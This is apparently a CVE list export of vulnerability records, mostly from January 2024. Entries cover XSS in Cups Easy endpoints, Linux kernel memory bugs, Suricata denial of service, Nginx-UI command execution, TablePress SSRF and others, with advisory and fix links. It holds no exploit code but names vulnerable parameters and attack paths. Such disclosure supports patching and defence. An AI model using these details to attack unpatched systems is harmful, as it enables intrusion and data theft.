CVE 2024 23864 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23863 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuredisplay.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23862 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grndisplay.php, in the grnno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23861 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/unitofmeasurementcreate.php, in the unitofmeasurementid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23860 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/currencylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23859 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructurelinecreate.php, in the flatamount parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23858 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stockissuancelinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23857 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlinecreate.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23856 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemlist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23855 Candidate A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodemodify.php, in multiple parameters. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy Assigned (20240123)
CVE 2024 23854 Candidate ** REJECT ** This CVE ID was unused by the CNA. Assigned (20240123)
CVE 2024 23851 Candidate copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel->data_size check. This is related to ctl_ioctl. FEDORA:FEDORA-2024-d16d94b00d | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/ | MISC:https://www.spinics.net/lists/dm-devel/msg56574.html | MISC:https://www.spinics.net/lists/dm-devel/msg56694.html Assigned (20240123)
CVE 2024 23850 Candidate In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation. FEDORA:FEDORA-2024-d16d94b00d | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/ | MISC:https://lore.kernel.org/all/6a80cb4b32af89787dadee728310e5e2ca85343f.1705741883.git.wqu@suse.com/ | MISC:https://lore.kernel.org/lkml/CALGdzuo6awWdau3X=8XK547x2vX_-VoFmH1aPsqosRTQ5WzJVA@mail.gmail.com/ Assigned (20240123)
CVE 2024 23849 Candidate In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access. FEDORA:FEDORA-2024-2116a8468b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/ | FEDORA:FEDORA-2024-cf47b35a6c | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LBVHM4LGMFIHBN4UBESYRFMYX3WUICV5/ | MISC:https://bugzilla.suse.com/show_bug.cgi?id=1219127 | MISC:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=13e788deb7348cc88df34bed736c3b3b9927ea52 | MISC:https://lore.kernel.org/netdev/1705715319-19199-1-git-send-email-sharath.srinivasan@oracle.com/ | MISC:https://lore.kernel.org/netdev/CALGdzuoVdq-wtQ4Az9iottBqC5cv9ZhcE5q8N7LfYFvkRsOVcw@mail.gmail.com Assigned (20240123)
CVE 2024 23848 Candidate In the Linux kernel through 6.7.1, there is a use-after-free in cec_queue_msg_fh, related to drivers/media/cec/core/cec-adap.c and drivers/media/cec/core/cec-api.c. MISC:https://lore.kernel.org/lkml/e9f42704-2f99-4f2c-ade5-f952e5fd53e5@xs4all.nl/ Assigned (20240123)
CVE 2024 23842 Candidate Improper Input Validation in Hitron Systems DVR LGUVR-16H 1.02~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW. MISC:http://www.hitron.co.kr/firmware/ | URL:http://www.hitron.co.kr/firmware/ Assigned (20240123)
CVE 2024 23841 Candidate apollo-client-nextjs is the Apollo Client support for the Next.js App Router. The @apollo/experimental-apollo-client-nextjs NPM package is vulnerable to a cross-site scripting vulnerability. To exploit this vulnerability, an attacker would need to either inject malicious input (e.g. by redirecting a user to a specifically-crafted link) or arrange to have malicious input be returned by a GraphQL server (e.g. by persisting it in a database). To fix this issue, please update to version 0.7.0 or later. MISC:https://github.com/apollographql/apollo-client-nextjs/commit/b92bc42abd5f8e17d4db361c36bd08e4f541a46b | URL:https://github.com/apollographql/apollo-client-nextjs/commit/b92bc42abd5f8e17d4db361c36bd08e4f541a46b | MISC:https://github.com/apollographql/apollo-client-nextjs/security/advisories/GHSA-rv8p-rr2h-fgpg | URL:https://github.com/apollographql/apollo-client-nextjs/security/advisories/GHSA-rv8p-rr2h-fgpg Assigned (20240122)
CVE 2024 23840 Candidate GoReleaser builds Go binaries for several platforms, creates a GitHub release and then pushes a Homebrew formula to a tap repository. `goreleaser release --debug` log shows secret values used in the in the custom publisher. This vulnerability is fixed in 1.24.0. MISC:https://github.com/goreleaser/goreleaser/commit/d5b6a533ca1dc3366983d5d31ee2d2b6232b83c0 | URL:https://github.com/goreleaser/goreleaser/commit/d5b6a533ca1dc3366983d5d31ee2d2b6232b83c0 | MISC:https://github.com/goreleaser/goreleaser/security/advisories/GHSA-h3q2-8whx-c29h | URL:https://github.com/goreleaser/goreleaser/security/advisories/GHSA-h3q2-8whx-c29h Assigned (20240122)
CVE 2024 2384 Candidate The WooCommerce POS plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.4.11. This is due to the plugin not properly verifying the authentication and authorization of the current user This makes it possible for authenticated attackers, with customer-level access and above, to view potentially sensitive information about other users by leveraging their order id MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3053833%40woocommerce-pos&new=3053833%40woocommerce-pos&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3053833%40woocommerce-pos&new=3053833%40woocommerce-pos&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b8ba69-aa8b-436f-990c-39e283f5d2f2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b8ba69-aa8b-436f-990c-39e283f5d2f2?source=cve Assigned (20240311)
CVE 2024 23839 Candidate Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.3, specially crafted traffic can cause a heap use after free if the ruleset uses the http.request_header or http.response_header keyword. The vulnerability has been patched in 7.0.3. To work around the vulnerability, avoid the http.request_header and http.response_header keywords. FEDORA:FEDORA-2024-7b063bce0a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXJIT7R53ZXROO3I256RFUWTIW4ECK6P/ | FEDORA:FEDORA-2024-bd4eed8466 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GOCOBFUTIFHOP2PZOH4ENRFXRBHIRKK4/ | MISC:https://github.com/OISF/suricata/commit/cd731fcaf42e5f7078c9be643bfa0cee2ad53e8f | URL:https://github.com/OISF/suricata/commit/cd731fcaf42e5f7078c9be643bfa0cee2ad53e8f | MISC:https://github.com/OISF/suricata/security/advisories/GHSA-qxj6-hr2p-mmc7 | URL:https://github.com/OISF/suricata/security/advisories/GHSA-qxj6-hr2p-mmc7 | MISC:https://redmine.openinfosecfoundation.org/issues/6657 | URL:https://redmine.openinfosecfoundation.org/issues/6657 Assigned (20240122)
CVE 2024 23838 Candidate TrueLayer.NET is the .Net client for TrueLayer. The vulnerability could potentially allow a malicious actor to gain control over the destination URL of the HttpClient used in the API classes. For applications using the SDK, requests to unexpected resources on local networks or to the internet could be made which could lead to information disclosure. The issue can be mitigated by having strict egress rules limiting the destinations to which requests can be made, and applying strict validation to any user input passed to the `truelayer-dotnet` library. Versions of TrueLayer.Client `v1.6.0` and later are not affected. MISC:https://github.com/TrueLayer/truelayer-dotnet/commit/75e436ed5360faa73d6e7ce3a9903a3c49505e3e | URL:https://github.com/TrueLayer/truelayer-dotnet/commit/75e436ed5360faa73d6e7ce3a9903a3c49505e3e | MISC:https://github.com/TrueLayer/truelayer-dotnet/security/advisories/GHSA-67m4-qxp3-j6hh | URL:https://github.com/TrueLayer/truelayer-dotnet/security/advisories/GHSA-67m4-qxp3-j6hh Assigned (20240122)
CVE 2024 23837 Candidate LibHTP is a security-aware parser for the HTTP protocol. Crafted traffic can cause excessive processing time of HTTP headers, leading to denial of service. This issue is addressed in 0.5.46. FEDORA:FEDORA-2024-7b063bce0a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXJIT7R53ZXROO3I256RFUWTIW4ECK6P/ | FEDORA:FEDORA-2024-bd4eed8466 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GOCOBFUTIFHOP2PZOH4ENRFXRBHIRKK4/ | MISC:https://github.com/OISF/libhtp/commit/20ac301d801cdf01b3f021cca08a22a87f477c4a | URL:https://github.com/OISF/libhtp/commit/20ac301d801cdf01b3f021cca08a22a87f477c4a | MISC:https://github.com/OISF/libhtp/security/advisories/GHSA-f9wf-rrjj-qx8m | URL:https://github.com/OISF/libhtp/security/advisories/GHSA-f9wf-rrjj-qx8m | MISC:https://redmine.openinfosecfoundation.org/issues/6444 | URL:https://redmine.openinfosecfoundation.org/issues/6444 Assigned (20240122)
CVE 2024 23836 Candidate Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 6.0.16 and 7.0.3, an attacker can craft traffic to cause Suricata to use far more CPU and memory for processing the traffic than needed, which can lead to extreme slow downs and denial of service. This vulnerability is patched in 6.0.16 or 7.0.3. Workarounds include disabling the affected protocol app-layer parser in the yaml and reducing the `stream.reassembly.depth` value helps reduce the severity of the issue. FEDORA:FEDORA-2024-7b063bce0a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXJIT7R53ZXROO3I256RFUWTIW4ECK6P/ | FEDORA:FEDORA-2024-bd4eed8466 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GOCOBFUTIFHOP2PZOH4ENRFXRBHIRKK4/ | MISC:https://github.com/OISF/suricata/commit/18841a58da71e735ddf4e52cbfa6989755ecbeb7 | URL:https://github.com/OISF/suricata/commit/18841a58da71e735ddf4e52cbfa6989755ecbeb7 | MISC:https://github.com/OISF/suricata/commit/2a2120ecf10c5b5713ec2bf59469fe57f7b5b747 | URL:https://github.com/OISF/suricata/commit/2a2120ecf10c5b5713ec2bf59469fe57f7b5b747 | MISC:https://github.com/OISF/suricata/commit/83c5567ea7b0b28376f57dcfee9c6301448c7bc7 | URL:https://github.com/OISF/suricata/commit/83c5567ea7b0b28376f57dcfee9c6301448c7bc7 | MISC:https://github.com/OISF/suricata/commit/8efaebe293e2a74c8e323fa85a6f5fadf82801bc | URL:https://github.com/OISF/suricata/commit/8efaebe293e2a74c8e323fa85a6f5fadf82801bc | MISC:https://github.com/OISF/suricata/commit/97953998d2d60673ed6c30ddfb6a2d59b4230f97 | URL:https://github.com/OISF/suricata/commit/97953998d2d60673ed6c30ddfb6a2d59b4230f97 | MISC:https://github.com/OISF/suricata/commit/b1549e930f6426eeff43f12b672337cbcda566b8 | URL:https://github.com/OISF/suricata/commit/b1549e930f6426eeff43f12b672337cbcda566b8 | MISC:https://github.com/OISF/suricata/commit/cd035d59e3df157b606f4fe67324ea8e437be786 | URL:https://github.com/OISF/suricata/commit/cd035d59e3df157b606f4fe67324ea8e437be786 | MISC:https://github.com/OISF/suricata/commit/ce9b90326949c94a46611d6394e28600ee5e8bd5 | URL:https://github.com/OISF/suricata/commit/ce9b90326949c94a46611d6394e28600ee5e8bd5 | MISC:https://github.com/OISF/suricata/commit/e7e28822f473320658d6125f16ac3f0524baff01 | URL:https://github.com/OISF/suricata/commit/e7e28822f473320658d6125f16ac3f0524baff01 | MISC:https://github.com/OISF/suricata/commit/f9de1cca6182e571f1c02387dca6e695e55608af | URL:https://github.com/OISF/suricata/commit/f9de1cca6182e571f1c02387dca6e695e55608af | MISC:https://github.com/OISF/suricata/security/advisories/GHSA-q33q-45cr-3cpc | URL:https://github.com/OISF/suricata/security/advisories/GHSA-q33q-45cr-3cpc | MISC:https://redmine.openinfosecfoundation.org/issues/6531 | URL:https://redmine.openinfosecfoundation.org/issues/6531 | MISC:https://redmine.openinfosecfoundation.org/issues/6532 | URL:https://redmine.openinfosecfoundation.org/issues/6532 | MISC:https://redmine.openinfosecfoundation.org/issues/6540 | URL:https://redmine.openinfosecfoundation.org/issues/6540 | MISC:https://redmine.openinfosecfoundation.org/issues/6658 | URL:https://redmine.openinfosecfoundation.org/issues/6658 | MISC:https://redmine.openinfosecfoundation.org/issues/6659 | URL:https://redmine.openinfosecfoundation.org/issues/6659 | MISC:https://redmine.openinfosecfoundation.org/issues/6660 | URL:https://redmine.openinfosecfoundation.org/issues/6660 Assigned (20240122)
CVE 2024 23835 Candidate Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to version 7.0.3, excessive memory use during pgsql parsing could lead to OOM-related crashes. This vulnerability is patched in 7.0.3. As workaround, users can disable the pgsql app layer parser. FEDORA:FEDORA-2024-7b063bce0a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXJIT7R53ZXROO3I256RFUWTIW4ECK6P/ | FEDORA:FEDORA-2024-bd4eed8466 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GOCOBFUTIFHOP2PZOH4ENRFXRBHIRKK4/ | MISC:https://github.com/OISF/suricata/commit/86de7cffa7e8f06fe9d600127e7dabe89c7e81dd | URL:https://github.com/OISF/suricata/commit/86de7cffa7e8f06fe9d600127e7dabe89c7e81dd | MISC:https://github.com/OISF/suricata/commit/f52c033e566beafb4480c139eb18662a2870464f | URL:https://github.com/OISF/suricata/commit/f52c033e566beafb4480c139eb18662a2870464f | MISC:https://github.com/OISF/suricata/security/advisories/GHSA-8583-353f-mvwc | URL:https://github.com/OISF/suricata/security/advisories/GHSA-8583-353f-mvwc | MISC:https://redmine.openinfosecfoundation.org/issues/6411 | URL:https://redmine.openinfosecfoundation.org/issues/6411 Assigned (20240122)
CVE 2024 23834 Candidate Discourse is an open-source discussion platform. Improperly sanitized user input could lead to an XSS vulnerability in some situations. This vulnerability only affects Discourse instances which have disabled the default Content Security Policy. The vulnerability is patched in 3.1.5 and 3.2.0.beta5. As a workaround, ensure Content Security Policy is enabled and does not include `unsafe-inline`. MISC:https://github.com/discourse/discourse/commit/568d704a94c528b7c2cb0f3512a7b7b606bc3000 | URL:https://github.com/discourse/discourse/commit/568d704a94c528b7c2cb0f3512a7b7b606bc3000 | MISC:https://github.com/discourse/discourse/security/advisories/GHSA-rj3g-8q6p-63pc | URL:https://github.com/discourse/discourse/security/advisories/GHSA-rj3g-8q6p-63pc | MISC:https://meta.discourse.org/t/3-1-5-security-and-bug-fix-release/293094 | URL:https://meta.discourse.org/t/3-1-5-security-and-bug-fix-release/293094 | MISC:https://meta.discourse.org/t/3-2-0-beta5-add-groups-to-dms-mobile-chat-footer-redesign-passkeys-enabled-by-default-and-more/293093 | URL:https://meta.discourse.org/t/3-2-0-beta5-add-groups-to-dms-mobile-chat-footer-redesign-passkeys-enabled-by-default-and-more/293093 Assigned (20240122)
CVE 2024 23833 Candidate OpenRefine is a free, open source power tool for working with messy data and improving it. A jdbc attack vulnerability exists in OpenRefine(version<=3.7.7) where an attacker may construct a JDBC query which may read files on the host filesystem. Due to the newer MySQL driver library in the latest version of OpenRefine (8.0.30), there is no associated deserialization utilization point, so original code execution cannot be achieved, but attackers can use this vulnerability to read sensitive files on the target server. This issue has been addressed in version 3.7.8. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/OpenRefine/OpenRefine/commit/41ccf574847d856e22488a7c0987ad8efa12a84a | URL:https://github.com/OpenRefine/OpenRefine/commit/41ccf574847d856e22488a7c0987ad8efa12a84a | MISC:https://github.com/OpenRefine/OpenRefine/security/advisories/GHSA-6p92-qfqf-qwx4 | URL:https://github.com/OpenRefine/OpenRefine/security/advisories/GHSA-6p92-qfqf-qwx4 Assigned (20240122)
CVE 2024 23832 Candidate Mastodon is a free, open-source social network server based on ActivityPub Mastodon allows configuration of LDAP for authentication. Due to insufficient origin validation in all Mastodon, attackers can impersonate and take over any remote account. Every Mastodon version prior to 3.5.17 is vulnerable, as well as 4.0.x versions prior to 4.0.13, 4.1.x version prior to 4.1.13, and 4.2.x versions prior to 4.2.5. MISC:https://github.com/mastodon/mastodon/commit/1726085db5cd73dd30953da858f9887bcc90b958 | URL:https://github.com/mastodon/mastodon/commit/1726085db5cd73dd30953da858f9887bcc90b958 | MISC:https://github.com/mastodon/mastodon/security/advisories/GHSA-3fjr-858r-92rw | URL:https://github.com/mastodon/mastodon/security/advisories/GHSA-3fjr-858r-92rw | MLIST:[oss-security] 20240202 CVE-2024-23832: Mastodon: Remote user impersonation and takeover | URL:http://www.openwall.com/lists/oss-security/2024/02/02/4 Assigned (20240122)
CVE 2024 23831 Candidate LedgerSMB is a free web-based double-entry accounting system. When a LedgerSMB database administrator has an active session in /setup.pl, an attacker can trick the admin into clicking on a link which automatically submits a request to setup.pl without the admin's consent. This request can be used to create a new user account with full application (/login.pl) privileges, leading to privilege escalation. The vulnerability is patched in versions 1.10.30 and 1.11.9. MISC:https://github.com/ledgersmb/LedgerSMB/commit/8c2ae5be68a782d62cb9c0e17c0127bf30ef4165 | URL:https://github.com/ledgersmb/LedgerSMB/commit/8c2ae5be68a782d62cb9c0e17c0127bf30ef4165 | MISC:https://github.com/ledgersmb/LedgerSMB/security/advisories/GHSA-98ff-f638-qxjm | URL:https://github.com/ledgersmb/LedgerSMB/security/advisories/GHSA-98ff-f638-qxjm Assigned (20240122)
CVE 2024 23830 Candidate MantisBT is an open source issue tracker. Prior to version 2.26.1, an unauthenticated attacker who knows a user's email address and username can hijack the user's account by poisoning the link in the password reset notification message. A patch is available in version 2.26.1. As a workaround, define `$g_path` as appropriate in `config_inc.php`. MISC:https://github.com/mantisbt/mantisbt/commit/7055731d09ff12b2781410a372f790172e279744 | URL:https://github.com/mantisbt/mantisbt/commit/7055731d09ff12b2781410a372f790172e279744 | MISC:https://github.com/mantisbt/mantisbt/security/advisories/GHSA-mcqj-7p29-9528 | URL:https://github.com/mantisbt/mantisbt/security/advisories/GHSA-mcqj-7p29-9528 | MISC:https://mantisbt.org/bugs/view.php?id=19381 | URL:https://mantisbt.org/bugs/view.php?id=19381 Assigned (20240122)
CVE 2024 23829 Candidate aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Security-sensitive parts of the Python HTTP parser retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input. Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling. The unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities. This vulnerability exists due to an incomplete fix for CVE-2023-47627. Version 3.9.2 fixes this vulnerability. FEDORA:FEDORA-2024-0ddda4c691 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/ | FEDORA:FEDORA-2024-f249b74f03 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/ | MISC:https://github.com/aio-libs/aiohttp/commit/33ccdfb0a12690af5bb49bda2319ec0907fa7827 | URL:https://github.com/aio-libs/aiohttp/commit/33ccdfb0a12690af5bb49bda2319ec0907fa7827 | MISC:https://github.com/aio-libs/aiohttp/pull/8074 | URL:https://github.com/aio-libs/aiohttp/pull/8074 | MISC:https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8qpw-xqxj-h4r2 | URL:https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8qpw-xqxj-h4r2 Assigned (20240122)
CVE 2024 23828 Candidate Nginx-UI is a web interface to manage Nginx configurations. It is vulnerable to an authenticated arbitrary command execution via CRLF attack when changing the value of test_config_cmd or start_cmd. This vulnerability exists due to an incomplete fix for CVE-2024-22197 and CVE-2024-22198. This vulnerability has been patched in version 2.0.0.beta.12. MISC:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-qcjq-7f7v-pvc8 | URL:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-qcjq-7f7v-pvc8 Assigned (20240122)
CVE 2024 23827 Candidate Nginx-UI is a web interface to manage Nginx configurations. The Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system. It's possible to leverage the vulnerability into a remote code execution overwriting the config file app.ini. Version 2.0.0.beta.12 fixed the issue. MISC:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m | URL:https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m Assigned (20240122)
CVE 2024 23826 Candidate spbu_se_site is the website of the Department of System Programming of St. Petersburg State University. Before 2024.01.29, when uploading an avatar image, an authenticated user may intentionally use a large Unicode filename which would lead to a server-side denial of service under Windows. This is due to no limitation of the length of the filename and the costly use of the Unicode normalization with the form NFKD on Windows OS. This vulnerability was fixed in the 2024.01.29 release. MISC:https://github.com/spbu-se/spbu_se_site/commit/5ad623eb0405260763046343c5785bc588d8a57d | URL:https://github.com/spbu-se/spbu_se_site/commit/5ad623eb0405260763046343c5785bc588d8a57d | MISC:https://github.com/spbu-se/spbu_se_site/security/advisories/GHSA-5vfc-v7hg-pvwm | URL:https://github.com/spbu-se/spbu_se_site/security/advisories/GHSA-5vfc-v7hg-pvwm Assigned (20240122)
CVE 2024 23825 Candidate TablePress is a table plugin for WordPress. For importing tables, TablePress makes external HTTP requests based on a URL that is provided by the user. That user input is filtered insufficiently, which makes it is possible to send requests to unintended network locations and receive responses. On sites in a cloud environment like AWS, an attacker can potentially make GET requests to the instance's metadata REST API. If the instance's configuration is insecure, this can lead to the exposure of internal data, including credentials. This vulnerability is fixed in 2.2.5. MISC:https://github.com/TablePress/TablePress/commit/62aab50e7a9c486caaeff26dff4dc01e059ecb91 | URL:https://github.com/TablePress/TablePress/commit/62aab50e7a9c486caaeff26dff4dc01e059ecb91 | MISC:https://github.com/TablePress/TablePress/security/advisories/GHSA-x8rf-c8x6-mrpg | URL:https://github.com/TablePress/TablePress/security/advisories/GHSA-x8rf-c8x6-mrpg Assigned (20240122)
CVE 2024 23824 Candidate mailcow is a dockerized email package, with multiple containers linked in one bridged network. The application is vulnerable to pixel flood attack, once the payload has been successfully uploaded in the logo the application goes slow and doesn't respond in the admin page. It is tested on the versions 2023-12a and prior and patched in version 2024-01. MISC:https://github.com/0xbunniee/MailCow-Pixel-Flood-Attack | URL:https://github.com/0xbunniee/MailCow-Pixel-Flood-Attack | MISC:https://github.com/mailcow/mailcow-dockerized/commit/7f6f7e0e9ff608618e5b144bcf18d279610aa3ed | URL:https://github.com/mailcow/mailcow-dockerized/commit/7f6f7e0e9ff608618e5b144bcf18d279610aa3ed | MISC:https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-45rv-3c5p-w4h7 | URL:https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-45rv-3c5p-w4h7 Assigned (20240122)
CVE 2024 23823 Candidate vantage6 is an open source framework built to enable, manage and deploy privacy enhancing technologies like Federated Learning and Multi-Party Computation. The vantage6 server has no restrictions on CORS settings. It should be possible for people to set the allowed origins of the server. The impact is limited because v6 does not use session cookies. This issue has been addressed in commit `70bb4e1d8` and is expected to ship in subsequent releases. Users are advised to upgrade as soon as a new release is available. There are no known workarounds for this vulnerability. MISC:https://github.com/vantage6/vantage6/commit/70bb4e1d889230a841eb364d6c03accd7dd01a41 | URL:https://github.com/vantage6/vantage6/commit/70bb4e1d889230a841eb364d6c03accd7dd01a41 | MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-4946-85pr-fvxh | URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-4946-85pr-fvxh Assigned (20240122)
CVE 2024 23822 Candidate Thruk is a multibackend monitoring webinterface. Prior to 3.12, the Thruk web monitoring application presents a vulnerability in a file upload form that allows a threat actor to arbitrarily upload files to the server to any path they desire and have permissions for. This vulnerability is known as Path Traversal or Directory Traversal. Version 3.12 fixes the issue. MISC:https://github.com/sni/Thruk/commit/1aa9597cdf2722a69651124f68cbb449be12cc39 | URL:https://github.com/sni/Thruk/commit/1aa9597cdf2722a69651124f68cbb449be12cc39 | MISC:https://github.com/sni/Thruk/security/advisories/GHSA-4mrh-mx7x-rqjx | URL:https://github.com/sni/Thruk/security/advisories/GHSA-4mrh-mx7x-rqjx Assigned (20240122)
